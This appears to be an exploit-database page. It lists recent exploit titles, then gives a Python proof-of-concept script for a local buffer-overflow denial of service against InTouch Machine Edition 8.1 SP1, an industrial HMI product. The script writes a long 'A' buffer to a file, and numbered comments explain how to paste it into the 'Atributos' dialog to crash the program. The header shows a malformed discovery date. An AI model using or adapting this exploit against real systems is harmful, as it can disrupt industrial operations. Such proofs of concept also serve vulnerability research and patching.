8162754975
9 changes to exploits/shellcodes SMPlayer 19.5.0 - Denial of Service (PoC) InTouch Machine Edition 8.1 SP1 - 'Atributos' Denial of Service (PoC) ClamAV < 0.102.0 - 'bytecode_vm' Code Execution Waves MaxxAudio Drivers 1.1.6.0 - 'WavesSysSvc64' Unquoted Service Path Easy-Hide-IP 5.0.0.3 - 'EasyRedirect' Unquoted Service Path Microsoft Windows AppXsvc Deployment Extension - Privilege Escalation VMware WorkStation 12.5.5 - Virtual Machine Escape VMware WorkStation 12.5.3 - Virtual Machine Escape
24 lines
No EOL
902 B
Python
Executable file
24 lines
No EOL
902 B
Python
Executable file
# Exploit Title: InTouch Machine Edition 8.1 SP1 - 'Atributos' Denial of Service (PoC)
|
|
# Discovery by: chuyreds
|
|
# Discovery Date: 12019-11-16
|
|
# Vendor Homepage: https://on.wonderware.com/
|
|
# Software Link : https://on.wonderware.com/intouch-machine-edition
|
|
# Tested Version: 8.1 SP1
|
|
# Vulnerability Type: Denial of Service (DoS) Local
|
|
# Tested on OS: Windows 10 Pro x64 es
|
|
# InTouch Machine Edition 8.1 SP1.py
|
|
|
|
|
|
# Steps to Produce the Local Buffer Overflow (SEH Unicode):
|
|
# 1.- Run python code: InTouch_Machine_Edition_8.1.py
|
|
# 2.- Open InTouch_Machine_Edition_8.1.txt and copy content to clipboard
|
|
# 3.- Open ITME v8.1 InTouch Machine Edition
|
|
# 4.- On Graficos slect Atributos
|
|
# 5.- Paste ClipBoard on "No Redibujar"/"Deshabilitados" and click on "Aceptar"
|
|
#!/usr/bin/env python
|
|
|
|
|
|
buffer = "\x41" * 1026
|
|
f = open ("InTouch_Machine_Edition_8.1.txt", "w")
|
|
f.write(buffer)
|
|
f.close() |